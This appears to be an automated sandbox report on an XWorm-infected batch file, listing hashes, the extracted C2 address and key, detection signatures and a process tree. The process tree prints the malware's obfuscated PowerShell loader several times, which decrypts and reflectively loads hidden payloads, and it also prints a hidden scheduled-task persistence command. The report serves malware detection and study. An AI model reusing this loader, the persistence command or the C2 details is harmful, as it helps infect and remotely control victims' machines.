Analysis
-
max time kernel
111s -
max time network
110s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64 arch:x86 image:win10-20240404-en locale:en-us os:windows10-1703-x64 system -
submitted
15/06/2024, 18:59
Static task
static1
Behavioral task
behavioral1
Sample
binded.bat
Resource
win10-20240404-en
General
-
Target
binded.bat
-
Size
1.1MB
-
MD5
4fcc4a79a40b5d4eda4116d6296dc607
-
SHA1
4f140172d00f5a40eb9c0f07b166cfc2111f0d71
-
SHA256
888b6ce9498a1425df0701fdc73c99c255684ec192db6290e16bb4c82da8656e
-
SHA512
2614afb3e2f7f5501246d79c7871710d0048ebacc69e517766709fdcb56e858c27deb4ed0fe1eab46f8175033446fb2f720fb43ff161552986d31dd4a8e0ccc1
-
SSDEEP
24576:vVq7sFq6XgPKd2wM6RcN9vz4vO21SCKesDu8a1KZ/4hvXQ:vxlR6QBsxb/4C
Malware Config
Extracted
xworm
5.0
37.114.46.114:5555
ybJkzY88U2SuCjEV
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3560-399-0x000002586A1C0000-0x000002586A1CE000-memory.dmp family_xworm -
Blocklisted process makes network request 1 IoCs
flow pid Process 2 3560 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
pid Process 3560 powershell.exe 2688 powershell.exe 3744 powershell.exe 3028 powershell.exe 4920 powershell.exe 5068 powershell.exe 5048 powershell.exe 3832 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\$rundll_724_str svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4920 powershell.exe 4920 powershell.exe 4920 powershell.exe 5060 powershell.exe 5060 powershell.exe 5060 powershell.exe 5068 powershell.exe 5068 powershell.exe 5068 powershell.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 3832 powershell.exe 3832 powershell.exe 3832 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 2688 powershell.exe 2688 powershell.exe 2688 powershell.exe 3560 powershell.exe 2688 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3744 powershell.exe 3744 powershell.exe 3744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4920 powershell.exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeDebugPrivilege 5068 powershell.exe Token: SeDebugPrivilege 5048 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeIncreaseQuotaPrivilege 3832 powershell.exe Token: SeSecurityPrivilege 3832 powershell.exe Token: SeTakeOwnershipPrivilege 3832 powershell.exe Token: SeLoadDriverPrivilege 3832 powershell.exe Token: SeSystemProfilePrivilege 3832 powershell.exe Token: SeSystemtimePrivilege 3832 powershell.exe Token: SeProfSingleProcessPrivilege 3832 powershell.exe Token: SeIncBasePriorityPrivilege 3832 powershell.exe Token: SeCreatePagefilePrivilege 3832 powershell.exe Token: SeBackupPrivilege 3832 powershell.exe Token: SeRestorePrivilege 3832 powershell.exe Token: SeShutdownPrivilege 3832 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeSystemEnvironmentPrivilege 3832 powershell.exe Token: SeRemoteShutdownPrivilege 3832 powershell.exe Token: SeUndockPrivilege 3832 powershell.exe Token: SeManageVolumePrivilege 3832 powershell.exe Token: 33 3832 powershell.exe Token: 34 3832 powershell.exe Token: 35 3832 powershell.exe Token: 36 3832 powershell.exe Token: SeIncreaseQuotaPrivilege 3832 powershell.exe Token: SeSecurityPrivilege 3832 powershell.exe Token: SeTakeOwnershipPrivilege 3832 powershell.exe Token: SeLoadDriverPrivilege 3832 powershell.exe Token: SeSystemProfilePrivilege 3832 powershell.exe Token: SeSystemtimePrivilege 3832 powershell.exe Token: SeProfSingleProcessPrivilege 3832 powershell.exe Token: SeIncBasePriorityPrivilege 3832 powershell.exe Token: SeCreatePagefilePrivilege 3832 powershell.exe Token: SeBackupPrivilege 3832 powershell.exe Token: SeRestorePrivilege 3832 powershell.exe Token: SeShutdownPrivilege 3832 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeSystemEnvironmentPrivilege 3832 powershell.exe Token: SeRemoteShutdownPrivilege 3832 powershell.exe Token: SeUndockPrivilege 3832 powershell.exe Token: SeManageVolumePrivilege 3832 powershell.exe Token: 33 3832 powershell.exe Token: 34 3832 powershell.exe Token: 35 3832 powershell.exe Token: 36 3832 powershell.exe Token: SeIncreaseQuotaPrivilege 3832 powershell.exe Token: SeSecurityPrivilege 3832 powershell.exe Token: SeTakeOwnershipPrivilege 3832 powershell.exe Token: SeLoadDriverPrivilege 3832 powershell.exe Token: SeSystemProfilePrivilege 3832 powershell.exe Token: SeSystemtimePrivilege 3832 powershell.exe Token: SeProfSingleProcessPrivilege 3832 powershell.exe Token: SeIncBasePriorityPrivilege 3832 powershell.exe Token: SeCreatePagefilePrivilege 3832 powershell.exe Token: SeBackupPrivilege 3832 powershell.exe Token: SeRestorePrivilege 3832 powershell.exe Token: SeShutdownPrivilege 3832 powershell.exe Token: SeDebugPrivilege 3832 powershell.exe Token: SeSystemEnvironmentPrivilege 3832 powershell.exe Token: SeRemoteShutdownPrivilege 3832 powershell.exe Token: SeUndockPrivilege 3832 powershell.exe Token: SeManageVolumePrivilege 3832 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1468 wrote to memory of 4640 1468 cmd.exe 74 PID 1468 wrote to memory of 4640 1468 cmd.exe 74 PID 1468 wrote to memory of 4920 1468 cmd.exe 75 PID 1468 wrote to memory of 4920 1468 cmd.exe 75 PID 4920 wrote to memory of 5060 4920 powershell.exe 77 PID 4920 wrote to memory of 5060 4920 powershell.exe 77 PID 5060 wrote to memory of 3236 5060 powershell.exe 79 PID 5060 wrote to memory of 3236 5060 powershell.exe 79 PID 3236 wrote to memory of 3128 3236 cmd.exe 80 PID 3236 wrote to memory of 3128 3236 cmd.exe 80 PID 3236 wrote to memory of 5068 3236 cmd.exe 81 PID 3236 wrote to memory of 5068 3236 cmd.exe 81 PID 168 wrote to memory of 3840 168 cmd.exe 86 PID 168 wrote to memory of 3840 168 cmd.exe 86 PID 168 wrote to memory of 5048 168 cmd.exe 87 PID 168 wrote to memory of 5048 168 cmd.exe 87 PID 5048 wrote to memory of 3832 5048 powershell.exe 88 PID 5048 wrote to memory of 3832 5048 powershell.exe 88 PID 5048 wrote to memory of 4928 5048 powershell.exe 90 PID 5048 wrote to memory of 4928 5048 powershell.exe 90 PID 4928 wrote to memory of 756 4928 WScript.exe 91 PID 4928 wrote to memory of 756 4928 WScript.exe 91 PID 756 wrote to memory of 4964 756 cmd.exe 93 PID 756 wrote to memory of 4964 756 cmd.exe 93 PID 756 wrote to memory of 3560 756 cmd.exe 94 PID 756 wrote to memory of 3560 756 cmd.exe 94 PID 3560 wrote to memory of 3384 3560 powershell.exe 54 PID 3560 wrote to memory of 2556 3560 powershell.exe 84 PID 3560 wrote to memory of 2748 3560 powershell.exe 47 PID 3560 wrote to memory of 1368 3560 powershell.exe 25 PID 3560 wrote to memory of 4712 3560 powershell.exe 60 PID 3560 wrote to memory of 1360 3560 powershell.exe 24 PID 3560 wrote to memory of 1752 3560 powershell.exe 32 PID 3560 wrote to memory of 2732 3560 powershell.exe 46 PID 3560 wrote to memory of 1352 3560 powershell.exe 23 PID 3560 wrote to memory of 2520 3560 powershell.exe 43 PID 3560 wrote to memory of 2512 3560 powershell.exe 42 PID 3560 wrote to memory of 2704 3560 powershell.exe 45 PID 3560 wrote to memory of 732 3560 powershell.exe 8 PID 3560 wrote to memory of 4868 3560 powershell.exe 62 PID 3560 wrote to memory of 1560 3560 powershell.exe 28 PID 3560 wrote to memory of 1904 3560 powershell.exe 36 PID 3560 wrote to memory of 1508 3560 powershell.exe 27 PID 3560 wrote to memory of 916 3560 powershell.exe 13 PID 3560 wrote to memory of 1100 3560 powershell.exe 20 PID 3560 wrote to memory of 1684 3560 powershell.exe 31 PID 3560 wrote to memory of 1092 3560 powershell.exe 19 PID 3560 wrote to memory of 1876 3560 powershell.exe 38 PID 3560 wrote to memory of 1080 3560 powershell.exe 18 PID 3560 wrote to memory of 2252 3560 powershell.exe 40 PID 3560 wrote to memory of 868 3560 powershell.exe 12 PID 3560 wrote to memory of 1852 3560 powershell.exe 35 PID 3560 wrote to memory of 2832 3560 powershell.exe 50 PID 3560 wrote to memory of 3204 3560 powershell.exe 53 PID 3560 wrote to memory of 2808 3560 powershell.exe 49 PID 3560 wrote to memory of 1620 3560 powershell.exe 30 PID 3560 wrote to memory of 4180 3560 powershell.exe 65 PID 3560 wrote to memory of 3588 3560 powershell.exe 63 PID 3560 wrote to memory of 1216 3560 powershell.exe 22 PID 3560 wrote to memory of 1408 3560 powershell.exe 26 PID 3560 wrote to memory of 816 3560 powershell.exe 11 PID 3560 wrote to memory of 1208 3560 powershell.exe 21 PID 3560 wrote to memory of 2184 3560 powershell.exe 39 PID 3560 wrote to memory of 936 3560 powershell.exe 17
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch1⤵PID:816
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}2⤵PID:4236
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\svchost.bat" "3⤵PID:1844
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0r+0kyFBt0CB4/hGdDqpXDDHp0ZFdJ2yISJo1fJ42Xw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2eU97tnvMxgKqltgo/SJg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $keVus=New-Object System.IO.MemoryStream(,$param_var); $mUyJN=New-Object System.IO.MemoryStream; $kYZlL=New-Object System.IO.Compression.GZipStream($keVus, [IO.Compression.CompressionMode]::Decompress); $kYZlL.CopyTo($mUyJN); $kYZlL.Dispose(); $keVus.Dispose(); $mUyJN.Dispose(); $mUyJN.ToArray();}function execute_function($param_var,$param2_var){ $uJZpt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mEYQo=$uJZpt.EntryPoint; $mEYQo.Invoke($null, $param2_var);}$HNCvy = 'C:\Users\Admin\AppData\Local\svchost.bat';$host.UI.RawUI.WindowTitle = $HNCvy;$rjaMb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HNCvy).Split([Environment]::NewLine);foreach ($ddjCn in $rjaMb) { if ($ddjCn.StartsWith('EyTFRVkAWjarRNfpfcEu')) { $trlof=$ddjCn.Substring(20); break; }}$payloads_var=[string[]]$trlof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵PID:196
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$rundll_724_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$svchost_724.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3744
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$svchost_724.vbs"5⤵PID:2372
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$svchost_724.bat" "6⤵PID:5032
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0r+0kyFBt0CB4/hGdDqpXDDHp0ZFdJ2yISJo1fJ42Xw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2eU97tnvMxgKqltgo/SJg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $keVus=New-Object System.IO.MemoryStream(,$param_var); $mUyJN=New-Object System.IO.MemoryStream; $kYZlL=New-Object System.IO.Compression.GZipStream($keVus, [IO.Compression.CompressionMode]::Decompress); $kYZlL.CopyTo($mUyJN); $kYZlL.Dispose(); $keVus.Dispose(); $mUyJN.Dispose(); $mUyJN.ToArray();}function execute_function($param_var,$param2_var){ $uJZpt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mEYQo=$uJZpt.EntryPoint; $mEYQo.Invoke($null, $param2_var);}$HNCvy = 'C:\Users\Admin\AppData\Roaming\$svchost_724.bat';$host.UI.RawUI.WindowTitle = $HNCvy;$rjaMb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HNCvy).Split([Environment]::NewLine);foreach ($ddjCn in $rjaMb) { if ($ddjCn.StartsWith('EyTFRVkAWjarRNfpfcEu')) { $trlof=$ddjCn.Substring(20); break; }}$payloads_var=[string[]]$trlof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵PID:4128
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Command and Scripting Interpreter: PowerShell
PID:3028
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k rpcss1⤵PID:868
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:916
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:492
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:936
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork1⤵PID:1092
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:1100
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1208
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1216
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1352
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1360
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1368
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1508
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1560
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1588
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1620
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1684
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1776
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1784
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1852
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1904
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:1876
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2184
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2252
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2504
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2512
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2520
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2704
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2732
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2748
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2808
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2832
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:3204
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3384
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\binded.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ubDdfc++dGnZOierWx4nOy1eVZcVDN85yhJABtnz1EQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gCMQkn589+ljXLannfa+nQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RIlPD=New-Object System.IO.MemoryStream(,$param_var); $OGgVf=New-Object System.IO.MemoryStream; $eubOA=New-Object System.IO.Compression.GZipStream($RIlPD, [IO.Compression.CompressionMode]::Decompress); $eubOA.CopyTo($OGgVf); $eubOA.Dispose(); $RIlPD.Dispose(); $OGgVf.Dispose(); $OGgVf.ToArray();}function execute_function($param_var,$param2_var){ $QwKrI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WoDJg=$QwKrI.EntryPoint; $WoDJg.Invoke($null, $param2_var);}$JMcWp = 'C:\Users\Admin\AppData\Local\Temp\binded.bat';$host.UI.RawUI.WindowTitle = $JMcWp;$AmLgz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JMcWp).Split([Environment]::NewLine);foreach ($SNfpD in $AmLgz) { if ($SNfpD.StartsWith('pMkqFCQhZNmuDPfTbxXO')) { $BtghH=$SNfpD.Substring(20); break; }}$payloads_var=[string[]]$BtghH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:4640
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\AppData\Local\dllhost.bat4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\dllhost.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z2xC2h+C2t+xhefZVNgrwhVd+6cW81hKA09gr+Vgl4k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJXvi7Nv9XV1R1jEsJpl9g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYNnG=New-Object System.IO.MemoryStream(,$param_var); $ddxMX=New-Object System.IO.MemoryStream; $tCHGY=New-Object System.IO.Compression.GZipStream($FYNnG, [IO.Compression.CompressionMode]::Decompress); $tCHGY.CopyTo($ddxMX); $tCHGY.Dispose(); $FYNnG.Dispose(); $ddxMX.Dispose(); $ddxMX.ToArray();}function execute_function($param_var,$param2_var){ $FpgFt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IsQVI=$FpgFt.EntryPoint; $IsQVI.Invoke($null, $param2_var);}$gzWXE = 'C:\Users\Admin\AppData\Local\dllhost.bat';$host.UI.RawUI.WindowTitle = $gzWXE;$jVKyS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gzWXE).Split([Environment]::NewLine);foreach ($MYFti in $jVKyS) { if ($MYFti.StartsWith('mDQBKkDMpSmzSJjqvWce')) { $zEoKi=$MYFti.Substring(20); break; }}$payloads_var=[string[]]$zEoKi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:3128
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4712
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3588
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:4180
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\conhost.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:168 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtgTNLQD917Z3OfAalN5p6ncKCNzsah2L8s5ejdS+dc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnVmcutmPup+V829XIUyUQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EAIzG=New-Object System.IO.MemoryStream(,$param_var); $allpB=New-Object System.IO.MemoryStream; $qQadD=New-Object System.IO.Compression.GZipStream($EAIzG, [IO.Compression.CompressionMode]::Decompress); $qQadD.CopyTo($allpB); $qQadD.Dispose(); $EAIzG.Dispose(); $allpB.Dispose(); $allpB.ToArray();}function execute_function($param_var,$param2_var){ $EsoDJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XgHWj=$EsoDJ.EntryPoint; $XgHWj.Invoke($null, $param2_var);}$MwOvg = 'C:\Users\Admin\AppData\Local\conhost.bat';$host.UI.RawUI.WindowTitle = $MwOvg;$kBJQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($MwOvg).Split([Environment]::NewLine);foreach ($QatGk in $kBJQu) { if ($QatGk.StartsWith('vwDuqbmIlgDgjzMkEVvn')) { $STSYE=$QatGk.Substring(20); break; }}$payloads_var=[string[]]$STSYE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:3840
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
